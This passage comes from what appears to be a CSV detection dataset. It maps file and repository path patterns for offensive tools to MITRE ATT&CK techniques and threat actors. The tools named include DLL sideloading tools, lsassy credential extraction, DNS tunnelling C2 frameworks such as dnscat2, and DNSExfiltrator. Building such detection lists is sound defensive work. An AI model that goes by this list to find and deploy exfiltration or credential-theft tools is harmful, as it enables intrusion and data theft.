TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","6637" "*/DLLHound.git*",".{0,1000}\/DLLHound\.git.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","1","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","6638" "*/DLLHound.ps1*",".{0,1000}\/DLLHound\.ps1.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","1","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","6639" "*/dllinject.py*",".{0,1000}\/dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials 
from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6640" "*/dllinjection_rs.exe*",".{0,1000}\/dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6641" "*/dll-installer.ps1*",".{0,1000}\/dll\-installer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","6642" "*/DllNotificationInjection.git*",".{0,1000}\/DllNotificationInjection\.git.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","6643" "*/DllProxy.git*",".{0,1000}\/DllProxy\.git.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","6644" "*/dllproxy.nim*",".{0,1000}\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","6645" "*/DLL-Spoofer.git*",".{0,1000}\/DLL\-Spoofer\.git.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","6646" "*/dns_grabber.*",".{0,1000}\/dns_grabber\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","6647" "*/dns_spoof*",".{0,1000}\/dns_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","6648" "*/dns2tcp.git*",".{0,1000}\/dns2tcp\.git.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying 
TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6649" "*/dns2tcp/client/*",".{0,1000}\/dns2tcp\/client\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6650" "*/dns2tcp/common/*",".{0,1000}\/dns2tcp\/common\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6651" "*/dns2tcp/server*",".{0,1000}\/dns2tcp\/server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6652" "*/dns-black-cat.git*",".{0,1000}\/dns\-black\-cat\.git.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","6653" "*/dns-blacklist.nse*",".{0,1000}\/dns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6654" "*/dns-brute.nse*",".{0,1000}\/dns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6655" "*/dns-cache-snoop.nse*",".{0,1000}\/dns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6656" "*/dnscan.git*",".{0,1000}\/dnscan\.git.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","6657" "*/dnscan.py*",".{0,1000}\/dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","#linux","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","6658" "*/dnscat.c*",".{0,1000}\/dnscat\.c.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","6659" "*/dns-cat.exe*",".{0,1000}\/dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","6660" "*/dnscat2.git*",".{0,1000}\/dnscat2\.git.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","6661" "*/dns-check-zone.nse*",".{0,1000}\/dns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6662" "*/dnschef.exe*",".{0,1000}\/dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6663" "*/dnschef.ini*",".{0,1000}\/dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","#linux","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6664" "*/dnschef.log*",".{0,1000}\/dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","#logfile #linux","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6665" "*/dnschef.py*",".{0,1000}\/dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6666" "*/dnschef-ng.git*",".{0,1000}\/dnschef\-ng\.git.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6667" "*/dnschef-ng/*",".{0,1000}\/dnschef\-ng\/.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","6668" "*/dns-client-subnet-scan.nse*",".{0,1000}\/dns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6669" "*/dnscnc.py*",".{0,1000}\/dnscnc\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6670" "*/dnscrypt-proxy*",".{0,1000}\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","6671" "*/dnscrypt-proxy.git*",".{0,1000}\/dnscrypt\-proxy\.git.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt 
and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","6672" "*/dnsdump.py*",".{0,1000}\/dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","#linux","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","6673" "*/DNSExfiltrator*",".{0,1000}\/DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6674" "*/dnsExfiltrator.dll*",".{0,1000}\/dnsExfiltrator\.dll.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6675" "*/DNSExfiltrator.git*",".{0,1000}\/DNSExfiltrator\.git.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6676" "*/dnsexfiltrator.py*",".{0,1000}\/dnsexfiltrator\.py.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","6677" "*/dns-fuzz.nse*",".{0,1000}\/dns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6678" "*/DNS-Hijacking.git*",".{0,1000}\/DNS\-Hijacking\.git.{0,1000}","offensive_tool_keyword","DNS-Hijacking","DNS Hijacking in UNIX/Linux System by using raw socket and pcap","T1496 - T1040 - T1071.004 - T1090","TA0040 - TA0002 - TA0009","N/A","Sea Turtle","Sniffing & Spoofing","https://github.com/DyeKuu/DNS-Hijacking","1","1","#linux","N/A","9","1","5","2","2020-05-31T23:03:34Z","2020-05-02T08:49:22Z","6679" "*/dns-ip6-arpa-scan.nse*",".{0,1000}\/dns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6680" "*/dnskire.git*",".{0,1000}\/dnskire\.git.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6681" "*/dnskire.js*",".{0,1000}\/dnskire\.js.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data 
Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6682" "*/dnskire.log*",".{0,1000}\/dnskire\.log.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6683" "*/dnskire/.ssh/*",".{0,1000}\/dnskire\/\.ssh\/.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6684" "*/dns-nsec3-enum.nse*",".{0,1000}\/dns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6685" "*/dns-nsec-enum.nse*",".{0,1000}\/dns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6686" "*/dns-nsid.nse*",".{0,1000}\/dns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6687" "*/DNS-Persist/*",".{0,1000}\/DNS\-Persist\/.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","6688" "*/dnspot.git*",".{0,1000}\/dnspot\.git.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","6689" "*/dns-random-srcport.nse*",".{0,1000}\/dns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6690" "*/dns-random-txid.nse*",".{0,1000}\/dns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6691" "*/dnsrecon.py*",".{0,1000}\/dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6692" "*/dnsrecon-subdomain-bruteforce.py*",".{0,1000}\/dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6693" "*/dns-recursion.nse*",".{0,1000}\/dns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6694" "*/dns-service-discovery.nse*",".{0,1000}\/dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6695" "*/dnsspoof.c*",".{0,1000}\/dnsspoof\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. 